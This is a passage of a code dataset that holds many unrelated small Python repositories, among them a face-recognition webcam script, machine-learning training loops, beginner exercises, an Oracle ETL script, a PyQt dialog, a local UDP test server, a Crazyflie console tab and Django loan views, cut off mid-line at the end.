image_face_encoding\n]\n\n\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\ndef get_video():\n\twhile True:\n\t\tret, frame = camera.read()\n\t\tinputQueue.put(frame)\n\t\t#print inputQueue.qsize()\n\t\t\n\n\n\ndef face_detect():\n\tprocess_this_frame = True\n\twhile True:\n\t\tif not inputQueue.empty():\n\t\t\tframe = inputQueue.get()\n\t\t\tsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\t\t\trgb_small_frame = small_frame[:, :, ::-1]\n\t\t\tif process_this_frame:\n\t\t\t\tface_locations = face_recognition.face_locations(rgb_small_frame)\n\t\t\t\tface_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\t\t\t\tface_names = []\n\t\t\t\tfor face_encoding in face_encodings:\n\t\t\t\t\tmatches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\t\t\t\t\tname = \"Unknown\"\n\t\t\t\t\tif True in matches:\n\t\t\t\t\t\tfirst_match_index = matches.index(True)\n\t\t\t\t\t\tname = known_face_names[first_match_index]\n\t\t\t\t\tface_names.append(name)\n\t\t\tprocess_this_frame = not process_this_frame\n\t\t\tfor (top, right, bottom, left), name in zip(face_locations, face_names):\n\t\t\t\ttop *= 4\n\t\t\t\tright *= 4\n\t\t\t\tbottom *= 4\n\t\t\t\tleft *= 4\n\t\t\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\t\t\t\tcv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), -1)\n\t\t\t\tfont = cv2.FONT_HERSHEY_DUPLEX\n\t\t\t\tcv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\t\t\t\toutputQueue.put(frame)\n\t\t\nvideo_capture = threading.Thread(target = get_video, args = ())\nrun_face_detection = []\nfor i in range(0,1):\n\tt = threading.Thread(target = face_detect , args = ())\n\trun_face_detection.append(t)\n\nvideo_capture.daemon = True\nfor i in range(0,1):\n\trun_face_detection[i].daemon = True\n\t\nfor i in range(0,1):\n\trun_face_detection[i].start()\n\n\nvideo_capture.start()\n\nwhile True:\n\tif not outputQueue.empty():\n\t\tframe = outputQueue.get()\n\t\tcv2.imshow('Output', frame)\n\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\tbreak\n\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"arvindspanicker/Face-Recognition","sub_path":"detect_faces.py","file_name":"detect_faces.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1634247942","text":"for epoch in range(training_epochs):\n sess.run(training_step, feed_dict={x:train_x, y_:train_y})\n cost = sess.run(cost_function, feed_dict={x: train_x, y_: train_y})\n cost_history = np.append(cost_history, cost)\n correct_prediction = tf.equal(tf.argmax(y,1), tf.arg_max(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n pred_y = sess.run(y, feed_dict={x: test_x})\n mse = tf.reduce_mean(tf.square(pred_y - test_y))\n mse_ = sess.run(mse)\n mse_history.append(mse_)\n accuracy = sess.run(accuracy, feed_dict={x: train_x, y_:train_y})\n accuracy_history.append(accuracy)\n print('epoch: ', epoch, ' - ', 'cost: ', cost, '- MSE: ', mse_, '- Train Accuracy: ', accuracy)\n ","repo_name":"knecht-d/machineLearning","sub_path":"assets/listings/nnTrain.py","file_name":"nnTrain.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20042770842","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0,\n}\n\nrequired_water = 0\nrequired_milk = 0\nrequired_coffee = 0\n\n# TODO: 5. A function to check if present resources are sufficient to get the drink. If no enough resources, \"Sorry not enough water/ milk/ coffee.\"\ndef get_resources():\n print(f\"Water : {resources['water']}ml\")\n print(f\"Milk : {resources['milk']}ml\")\n print(f\"Coffee : {resources['coffee']}g\")\n print(f\"Money : ${resources['money']}\")\n\n\ndef are_enough_resources(drink):\n global required_water, required_coffee, required_milk\n drink_ingredients = MENU[drink][\"ingredients\"]\n for ingredient in drink_ingredients:\n if ingredient == \"water\":\n required_water = drink_ingredients[ingredient]\n elif ingredient == \"coffee\":\n required_coffee = drink_ingredients[ingredient]\n else:\n required_milk = drink_ingredients[ingredient]\n available_water = resources[\"water\"]\n available_milk = resources[\"milk\"]\n available_coffee = resources[\"coffee\"]\n if required_water > available_water:\n print(\"Sorry, there is not enough water in the machine.\")\n return False\n elif required_milk > available_milk:\n print(\"Sorry, there is not enough milk in the machine.\")\n return False\n elif required_coffee > available_coffee:\n print(\"Sorry, there is not enough coffee in the machine.\")\n return False\n else:\n return True\n\n\n# TODO: 6. If enough resources are available, then only prompt user to insert coins.\ndef user_provides_money():\n print(\"Please insert coins.\")\n quarters_inserted = int(input(\"how many quarters ?: \"))\n dimes_inserted = int(input(\"how many dimes ?: \"))\n nickles_inserted = int(input(\"how many nickles ?: \"))\n pennies_inserted = int(input(\"how many pennies ?: \"))\n return quarters_inserted, dimes_inserted, nickles_inserted, pennies_inserted\n\n\n# TODO: 7. Calculate the value of inserted coins\ndef calculate_value_of_coins():\n quarters, dimes, nickles, pennies = user_provides_money()\n total_input_money = (0.25 * quarters) + (0.10 * dimes) + (0.05 * nickles) + (0.01 * pennies)\n return total_input_money\n\n# TODO: 9. If money is enough, cost of drink is added to the money in resources dictionary and this should reflect in report\n# TODO: 10. If money is more than required, calculate change to be given (Change to be rounded to 2 decimal places). \"Here is $2.45 dollars in change.\"\ndef money_and_change_adjustment(user_money, drink_cost):\n change = 0.0\n resources[\"money\"] += drink_cost\n if user_money > drink_cost:\n change = round(user_money - drink_cost, 2)\n print(f\"Here is ${change} dollars in change.\")\n\n# TODO: 8. Check if inserted money is enough for drink or not. If money is not enough, print \"Sorry that's not enough money. Money refunded.\"\ndef is_money_enough(drink):\n input_money = calculate_value_of_coins()\n drink_cost = MENU[drink][\"cost\"]\n if input_money < drink_cost:\n print(\"Sorry that's not enough money. Money refunded.\")\n return False\n else:\n money_and_change_adjustment(user_money = input_money,drink_cost = drink_cost)\n return True\n\n# TODO: 11. After money is enough, resources are enough, then deduct resources needed for drink and update remaining resources.\ndef deduct_resources():\n resources[\"water\"] -= required_water\n resources[\"milk\"] -= required_milk\n resources[\"coffee\"] -= required_coffee\n\n#TODO: Last - Reset the used global variables again if any towards the end of the while loop\ndef reset_required_drink_values():\n global required_water, required_coffee, required_milk\n required_water = 0\n required_milk = 0\n required_coffee = 0\n\n\n# TODO: 1. Create a user input prompt to get user response to decide what is to be done. TODO: 2. This prompt should\n# be there even after an action is done or even after resources are gone - continuous while loop\ncoffee_machine_on = True\nwhile coffee_machine_on:\n user_prompt = input(\" What would you like? (espresso/latte/cappuccino): \")\n # TODO: 3. Coffe machine should only be turned off using 'off' keyword. while loop should stop only after 'off'\n # is entered.\n if user_prompt == \"off\":\n coffee_machine_on = False\n # TODO: 4. When 'report' is entered , we should get current resource values from resources dictionary\n elif user_prompt == \"report\":\n get_resources()\n elif user_prompt == \"espresso\" or user_prompt == \"latte\" or user_prompt == \"cappuccino\":\n resources_available = are_enough_resources(user_prompt)\n if resources_available:\n if is_money_enough(user_prompt):\n deduct_resources()\n # TODO: 12. At last, print message for user - \"Here is your {drink}. Enjoy!\"\n print(f\"Here is your {user_prompt}. Enjoy! ☕\")\n else:\n print(\"Sorry, we don't have this in our menu !!!\")\n reset_required_drink_values()\n","repo_name":"hitikabhatia/100_days_of_code_python_challenge","sub_path":"Coffee Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770896604","text":"\"\"\" Chico tem 1,50 metro e cresce 4 centímetros por ano, \nenquanto Zé tem 1,30 metro e cresce 6 centímetros por ano. \nConstrua um algoritmo que calcule e imprima quantos anos serão \nnecessários para que Zé seja maior que Chico. \"\"\"\n\nchico = float(1.50)\nZé = float(1.30)\ncontador = 0\n\nwhile Zé < chico:\n chico += 0.04\n Zé += 0.06\n contador +=1\ncontador +=1\nprint(contador)\n","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 3/exc4.py","file_name":"exc4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11592493615","text":"import tensorflow as tf\nsess = tf.InteractiveSession()\n\n\n#importing MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n\n#Building full computational Graph\n#Inputs and Outputs\nx = tf.placeholder(tf.float32, shape=[None, 784])\ny_ = tf.placeholder(tf.float32, shape=[None, 10])\n\n#weights and Baises\nW = tf.Variable(tf.zeros([784,10]))\nb = tf.Variable(tf.zeros([10]))\n\n\n\n#predicted output\n\n#using softamx function\ny = tf.nn.softmax(tf.matmul(x, W) + b)\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n#using softmax with logits\n# y = tf.matmul(x,W) + b\n# cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n\n\n#training=tf.train.GradientDescentOptimizer(1.0).minimize(cross_entropy)\n#training=tf.train.AdamOptimizer(0.005).minimize(cross_entropy)\n#training=tf.train.AdagradOptimizer(0.2).minimize(cross_entropy)\n#training=tf.train.AdadeltaOptimizer(20).minimize(cross_entropy)\n#training=tf.train.MomentumOptimizer(0.1,0.1).minimize(cross_entropy)\ntraining=tf.train.RMSPropOptimizer(0.01).minimize(cross_entropy)\n\n\n#initializing variables\n#Must initialize after optimiser because some optimisers like AdamOptimiser create variables\nsess.run(tf.global_variables_initializer())\n\nfor _ in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(training, feed_dict={x: batch_xs, y_: batch_ys})\n\n#evaluation\n#comparing indeces maximum element of both arrays\nprediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"venkatesh-sg/neural-networks","sub_path":"MNIST_Classification/Mnist_softmaxTensorFlow.py","file_name":"Mnist_softmaxTensorFlow.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13810067747","text":"from operators.oracle_query_to_csv import execute as OracleQueryToCSVExecute\r\nfrom operators.oracle_query import execute as OracleQueryExecute\r\nfrom operators.oracle_import_csv import execute as OracleImportCSVExecute\r\nimport os\r\nfrom urllib.parse import quote_plus\r\n\r\n# define OracleQueryToCSVExecute args\r\norigin_db_host = os.getenv(\"\")\r\norigin_db_port = str(os.getenv(\"\"))\r\norigin_db_name = os.getenv(\"\")\r\norigin_db_usr = os.getenv(\"\")\r\norigin_db_pwd = quote_plus(os.getenv(\"\"))\r\norigin_sql_query = open('').read()\r\norigin_output_folder = ''\r\norigin_output_file_name = __file__ # full path of the current file\r\norigin_output_file_name = os.path.basename(origin_output_file_name) # File name\r\norigin_output_file_name = os.path.splitext(origin_output_file_name)[0] # Remove extrension\r\n\r\n# define OracleImportCSVExecute args\r\ndestination_csv_folder = f'.\\\\automation\\\\{origin_output_folder}\\\\output'\r\ndestination_db_host = os.getenv(\"\")\r\ndestination_db_port = str(os.getenv(\"\"))\r\ndestination_db_name = os.getenv(\"\")\r\ndestination_db_usr = os.getenv(\"\")\r\ndestination_db_pwd = quote_plus(os.getenv(\"\"))\r\ndestination_db_schema = ''\r\ndestination_db_table = ''\r\ndestination_tb_columns = []\r\n\r\n# define OracleImportCSVExecute args\r\ndelete_sql_query = open('.\\\\automation\\\\sql\\\\delete_by_period.sql').read()\r\ndelete_sql_params = {\r\n \"db_schema\": '',\r\n \"db_table\": '',\r\n \"tb_dt_filter\": '',\r\n \"start_date\": '',\r\n \"end_date\": ''\r\n}\r\n\r\n#OracleQueryToCSVExecute(origin_db_host,origin_db_port,origin_db_name,origin_db_usr,origin_db_pwd,origin_sql_query,origin_output_folder,origin_output_file_name)\r\n# test how to filter the period to delete old data\r\n#OracleQueryExecute(destination_db_host,destination_db_port,destination_db_name,destination_db_usr,destination_db_pwd,delete_sql_query,delete_sql_params)\r\nOracleImportCSVExecute(destination_csv_folder,destination_db_host,destination_db_port,destination_db_name,destination_db_usr,destination_db_pwd,destination_db_schema,destination_db_table,destination_tb_columns)","repo_name":"moraesmm/code","sub_path":"automation/f_employee_insert_process.py","file_name":"f_employee_insert_process.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10375774335","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn, k = map(int, input().split())\r\na = list(map(int, input().split()))\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n global k\r\n\r\n i, j = left, mid+1\r\n res = []\r\n while i <= mid and j <= right:\r\n if arr[i] <= arr[j]:\r\n res.append(arr[i])\r\n k -= 1\r\n if k == 0:\r\n print(arr[i])\r\n return\r\n i += 1\r\n else:\r\n res.append(arr[j])\r\n k -= 1\r\n if k == 0:\r\n print(arr[j])\r\n return\r\n j += 1\r\n\r\n while i <= mid:\r\n res.append(arr[i])\r\n k -= 1\r\n if k == 0:\r\n print(arr[i])\r\n return\r\n i += 1\r\n while j <= right:\r\n res.append(arr[j])\r\n k -= 1\r\n if k == 0:\r\n print(arr[j])\r\n return\r\n j += 1\r\n\r\n for idx in range(left, right+1):\r\n arr[idx] = res[idx-left]\r\n return arr\r\n\r\n\r\ndef merge_sort(arr, left, right):\r\n if left < right:\r\n mid = (left + right) // 2\r\n merge_sort(arr, left, mid)\r\n merge_sort(arr, mid+1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\nmerge_sort(a, 0, len(a)-1)\r\nif k >= 1:\r\n print(-1)\r\n","repo_name":"yejin7211/Algorithm","sub_path":"백준/Silver/24060. 알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20852589961","text":"import os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef __merge_lists(base, settings, name):\n if not base.get(name):\n base[name] = []\n items = settings.get(name, [])\n for item in items:\n if item not in base[name]:\n base[name].append(item)\n\n\ndef merge_installed_apps(base, settings):\n __merge_lists(base, settings, 'INSTALLED_APPS')\n\n\ndef merge_hexdi_modules_list(base, settings):\n __merge_lists(base, settings, 'HEXDI_MODULES_LIST')\n\n\nMANUAL_MERGE = {\n 'INSTALLED_APPS': merge_installed_apps,\n 'HEXDI_MODULES_LIST': merge_hexdi_modules_list\n}\n\n\ndef module_to_dict(mdl):\n return mdl.__dict__\n\n\ndef merge_settings(base, settings):\n for item in settings:\n if item not in MANUAL_MERGE:\n base[item] = settings[item]\n for manual in MANUAL_MERGE:\n if manual in settings:\n MANUAL_MERGE[manual](base, settings)\n","repo_name":"InfinityEngine/hextrack-server","sub_path":"src/hextrack/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35503147635","text":"from pyfiglet import Figlet\n\ntree = r\"\"\"\n _-_\n /~~ ~~\\\n /~~ ~~\\\n { }\n \\ _- -_ /\n ~ \\\\ // ~\n _- - | | _- _\n _ - | | -_\n // \\\\\n\n\"\"\".split('\\n')\n\ndef intro():\n fig = Figlet(font='big', width=118, justify='center')\n fig = fig.renderText('Stem volume calculator')\n\n for i in range(len(tree)):\n print(tree[i].ljust(100), tree[i])\n\n print(fig)\n\n for i in range(len(tree)):\n print(tree[i].ljust(100), tree[i])","repo_name":"Jen-Wenzel/stem_vol_calc","sub_path":"code/ascii_art.py","file_name":"ascii_art.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74399535734","text":"from PyQt6.QtWidgets import QDialog, QVBoxLayout, QLineEdit, QComboBox, QPushButton\r\nimport sqlite3\r\n\r\n\r\nclass AddDialog(QDialog):\r\n def __init__(self):\r\n super().__init__()\r\n print(\"add dialog class has been initiated\")\r\n self.setWindowTitle(\"Add Student\")\r\n self.setFixedWidth(300)\r\n self.setFixedHeight(300)\r\n\r\n layout = QVBoxLayout()\r\n\r\n # Add student name\r\n self.student_name = QLineEdit()\r\n self.student_name.setPlaceholderText(\"Enter student's name\")\r\n layout.addWidget(self.student_name)\r\n\r\n print(\"About to start the combo Box\")\r\n # Add a combo box for courses\r\n self.course = QComboBox()\r\n course_name = ['Astronomy', 'Biology', 'Math', 'Physics']\r\n self.course.addItems(course_name)\r\n layout.addWidget(self.course)\r\n\r\n # Add a phone number\r\n self.phone = QLineEdit()\r\n self.phone.setPlaceholderText(\"Enter phone number\")\r\n layout.addWidget(self.phone)\r\n\r\n # register push button\r\n submit_btn = QPushButton(\"Register\")\r\n submit_btn.clicked.connect(self.addStudent)\r\n layout.addWidget(submit_btn)\r\n\r\n self.setLayout(layout)\r\n\r\n # add an addStudent method to add students to the \"database.db\"\r\n def addStudent(self):\r\n # print(\"Add Student initiated\")\r\n name = self.student_name.text()\r\n st_course = self.course.itemText(self.course.currentIndex())\r\n st_phone = self.phone.text()\r\n\r\n con = sqlite3.connect(\"database.db\")\r\n # print(\"Database has been connected\")\r\n\r\n cursor = con.cursor()\r\n # print(\"Cursor has been set\")\r\n\r\n cursor.execute(\"INSERT INTO students (name, course, mobile) VALUES (?, ?, ?)\", (name, st_course, st_phone))\r\n # print(\"Student has been added\")\r\n\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n self.accept()\r\n\r\n\r\n\r\n","repo_name":"emmaMarful/student_management_system","sub_path":"Dialogs.py","file_name":"Dialogs.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39237193211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTest additional, independent UDP server - open, receive, close.\n\n@author: ssklykov\n\"\"\"\n# %% Imports\nimport socket\nimport time\n# import numpy as np\n\n# %% Parameters\nhost = 'localhost'\nport_py_main = 5005 # number of the first ports of that will be opened\nport_py = 5010 # number of the first ports of that will be opened\nport_LV = 5100\nst_n_bytes = 1024\n\n# %% Test independent transfer - mainServer is opened below by \"with\" operator\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as mainServer:\n mainServer.bind((host, port_py_main))\n flag = True\n print(\"Python UDP Server launched\")\n\n while flag:\n (command, address) = mainServer.recvfrom(st_n_bytes)\n command = str(command, encoding='utf-8') # Conversion to a normal string\n if \"Ping\" in command:\n print(command, '- received command')\n sendingString = \"Echo\"\n sendingString = sendingString.encode() # to utf-8\n mainServer.sendto(sendingString, address)\n\n elif \"Open port\" in command:\n print(command, '- received command')\n sendingString = \"port \" + str(port_py) + \" will be opened\"\n sendingString = sendingString.encode() # to utf-8\n mainServer.sendto(sendingString, address)\n receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n receiver.bind((host, port_py))\n (data, address) = receiver.recvfrom(st_n_bytes)\n # print(\"from:\", address)\n data = str(data, encoding='utf-8')\n print(\"Received:\", data)\n sendingString = \"port \" + str(port_py) + \" OPENED\"\n sendingString = sendingString.encode() # to utf-8\n receiver.sendto(sendingString, address)\n time.sleep(0.25)\n finally:\n receiver.close()\n\n elif \"QUIT\" in command:\n print(command, '- received command')\n # Do the quiting action with a delay\n mainServer.sendto(sendingString, address)\n time.sleep(0.15) # A delay for preventing of closing connection automatically by Python (causing errors)\n flag = False\n break\n\n # time.sleep(1)\n","repo_name":"sklykov/sup_lv_proj","sub_path":"LV_Py_img_tr/scripts/addition_UDP_server.py","file_name":"addition_UDP_server.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3469357956","text":"emails = ['diksonnn@gmail.com', 'dikson_santos@outlook.com',\n 'gowdikson@hotmail.com', 'dikson.enterprise@gmail.com']\n\n\ndef filtra(lista, texto):\n filtrada = []\n for item in lista:\n if texto in item:\n filtrada.append(item)\n return filtrada\n\n\nprint(f\"Gmails: {filtra(emails, 'gmail')}\")\n\nprint(f\"Hotmails: {filtra(emails, 'hotmail.com')}\")\n","repo_name":"DiksonSantos/PYTHON_REV_BASICO_2021","sub_path":"MODULO_14_FUNCTIONS_DEF/07_Filtrando_String_DEF.py","file_name":"07_Filtrando_String_DEF.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70594377652","text":"from sklearn.model_selection import train_test_split\nfrom sklearn import datasets\n\nfrom Perceptron import Perseptron\nX, y = datasets.make_blobs(n_samples=500, n_features=3,\n centers=2, cluster_std=3, random_state=2)\nx_train, x_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=2)\n\n\n# plt.scatter(x_train[:, 0], x_train[:, 1], marker='o', c=y_train)\n# plt.show()\n\np = Perseptron(500)\np.fit(x_train, y_train)\n\ny_predicted = p.predict(x_test)\nEout = sum(abs(y_predicted[:, 0] - y_test))/len(y_test)\nprint(p.Error)\n","repo_name":"maArami/Ml","sub_path":"Perceptron/perceptron_test.py","file_name":"perceptron_test.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27107356273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 17 21:43:59 2017\n\n@author: Dean\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntestLen = 1000\nnoiseLevel = 0.01\nsinInput4 = np.zeros((3,testLen))\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[0] = ((np.sin(np.linspace(0, 10*np.pi, testLen))+5)*rd).reshape((testLen))\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[1] = ((np.sin(np.linspace(0, 18*np.pi, testLen)+1)+10)*rd).reshape((testLen))*2\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[2] = ((np.sin(np.linspace(0, 30*np.pi, testLen)-1)+21)*rd).reshape((testLen))*3\n\n\nif __name__ == \"__main__\":\n inSeq = sinInput4\n for i in range(inSeq.shape[0]):\n plt.plot(inSeq[i,:])\n plt.show()\n\ndef GetInSeq():\n return sinInput4","repo_name":"DeanIsMe/Overzealous_Oracle","sub_path":"scripts/TestSequences.py","file_name":"TestSequences.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34191974297","text":"import logging\n\nfrom PyQt6 import uic\nfrom PyQt6.QtCore import pyqtSignal\nfrom PyQt6.QtGui import QTextCursor\n\nimport cfclient\nfrom cfclient.ui.tab_toolbox import TabToolbox\n\n__author__ = 'Bitcraze AB'\n__all__ = ['ConsoleTab']\n\nlogger = logging.getLogger(__name__)\n\nconsole_tab_class = uic.loadUiType(cfclient.module_path +\n \"/ui/tabs/consoleTab.ui\")[0]\n\n\nclass ConsoleTab(TabToolbox, console_tab_class):\n \"\"\"Console tab for showing printouts from Crazyflie\"\"\"\n _link_established_signal = pyqtSignal(str)\n _connected_signal = pyqtSignal(str)\n _disconnected_signal = pyqtSignal(str)\n _update = pyqtSignal(str)\n\n def __init__(self, helper):\n super(ConsoleTab, self).__init__(helper, 'Console')\n self.setupUi(self)\n\n # Always wrap callbacks from Crazyflie API though QT Signal/Slots\n # to avoid manipulating the UI when rendering it\n self._link_established_signal.connect(self._link_established)\n self._connected_signal.connect(self._connected)\n self._disconnected_signal.connect(self._disconnected)\n self._update.connect(self.printText)\n\n self._helper.cf.console.receivedChar.add_callback(self._update.emit)\n self._helper.cf.connected.add_callback(self._connected_signal.emit)\n self._helper.cf.link_established.add_callback(self._link_established_signal.emit)\n self._helper.cf.disconnected.add_callback(\n self._disconnected_signal.emit)\n\n self._clearButton.clicked.connect(self.clear)\n self._dumpSystemLoadButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"system.taskDump\", '1'))\n self._dumpAssertInformation.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value_raw(\"system.assertInfo\", 0x08, 1))\n self._propellerTestButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"health.startPropTest\", '1'))\n self._batteryTestButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"health.startBatTest\", '1'))\n self._storageStatsButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"system.storageStats\", '1'))\n\n def printText(self, text):\n # Make sure we get printouts from the Crazyflie into the log (such as\n # build version and test ok/fail)\n logger.debug(\"[%s]\", text)\n scrollbar = self.console.verticalScrollBar()\n prev_scroll = scrollbar.value()\n prev_cursor = self.console.textCursor()\n was_maximum = prev_scroll == scrollbar.maximum()\n\n self.console.moveCursor(QTextCursor.MoveOperation.End)\n self.console.insertPlainText(text)\n\n self.console.setTextCursor(prev_cursor)\n\n if was_maximum and not prev_cursor.hasSelection():\n scrollbar.setValue(scrollbar.maximum())\n else:\n scrollbar.setValue(prev_scroll)\n\n def clear(self):\n self.console.clear()\n\n def _connected(self, link_uri):\n \"\"\"Callback when the Crazyflie has been connected\"\"\"\n self._dumpSystemLoadButton.setEnabled(True)\n self._propellerTestButton.setEnabled(True)\n self._batteryTestButton.setEnabled(True)\n self._storageStatsButton.setEnabled(True)\n\n def _disconnected(self, link_uri):\n \"\"\"Callback for when the Crazyflie has been disconnected\"\"\"\n self._dumpSystemLoadButton.setEnabled(False)\n self._dumpAssertInformation.setEnabled(False)\n self._propellerTestButton.setEnabled(False)\n self._batteryTestButton.setEnabled(False)\n self._storageStatsButton.setEnabled(False)\n\n def _link_established(self, link_uri):\n \"\"\"Callback when the first packet on a new link is received\"\"\"\n # Enable the assert dump button as early as possible. After an assert we will never get the connected() cb.\n self._dumpAssertInformation.setEnabled(True)\n","repo_name":"bitcraze/crazyflie-clients-python","sub_path":"src/cfclient/ui/tabs/ConsoleTab.py","file_name":"ConsoleTab.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"21"} +{"seq_id":"29645704833","text":"from datetime import datetime\nfrom django.db.models import Sum\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom core.models import Client, Payment, Loan, CreditScore\n\n\nclass IndexView(View):\n def get(self, request):\n current_user = request.session.get('user_id')\n\n user_credit_score = CreditScore.objects.get(client_id_id=current_user)\n latest_payments = Payment.objects.filter(client_id=request.session.get('user_id')).order_by('due_date')\n\n for p in latest_payments:\n loan = Loan.objects.get(loan_id=p.loan_id.loan_id)\n p.loan = loan\n\n # Fetch loans belonging to the current user\n loans = Loan.objects.filter(client_id=request.session.get('user_id'), status=\"Approved\")\n all_loans = Loan.objects.filter(client_id=request.session.get('user_id'))\n client = Client.objects.get(user_id=request.session.get('user_id'))\n total_loans_amount = Loan.objects.filter(client_id=request.session.get('user_id')).aggregate(\n Sum('amount_to_pay'))\n unpaid_total = Payment.objects.filter(status=\"Pending\", client_id=client.user_id).aggregate(Sum('amount'))\n paid_total = Payment.objects.filter(status=\"Paid\", client_id=client.user_id).aggregate(Sum('amount'))\n paid_total = paid_total[\"amount__sum\"] if paid_total[\"amount__sum\"] else 0\n paid_percentage = (paid_total / total_loans_amount[\"amount_to_pay__sum\"]) * 100 if paid_total > 0 else 0\n\n context = {\n \"creditscore\": user_credit_score,\n \"unpaid_total\": unpaid_total[\"amount__sum\"] if unpaid_total[\"amount__sum\"] else 0,\n \"paid_total\": paid_total,\n \"all_loans\": all_loans,\n \"loans\": loans,\n \"totalPayments\": latest_payments,\n \"paid_percentage\": \"{:.2f}\".format(paid_percentage),\n \"latestPayments\": latest_payments\n }\n\n return render(request, \"client_dashboard.html\", context)\n\n\nclass ContactUsView(View):\n def get(self, request):\n return render(request, 'Contact_Us.html')\n\n\nclass ViewLoanView(View):\n def get(self, request, loan_id):\n try:\n loan = Loan.objects.get(loan_id=loan_id)\n payments = Payment.objects.filter(loan_id=loan_id)\n client = Client.objects.get(user_id=loan.client.user_id)\n\n context = {\n \"loan\": loan,\n \"client\": client,\n \"payments\": payments,\n }\n\n return render(request, \"loan/view_loan.html\", context)\n except Loan.DoesNotExist:\n return redirect(\"/client_dashboard/\")\n\n\nclass ApplyLoanView(View):\n def get(self, request):\n user_id = request.session[\"user_id\"]\n start_date = request.GET.get(\"start_date\", None)\n end_date = 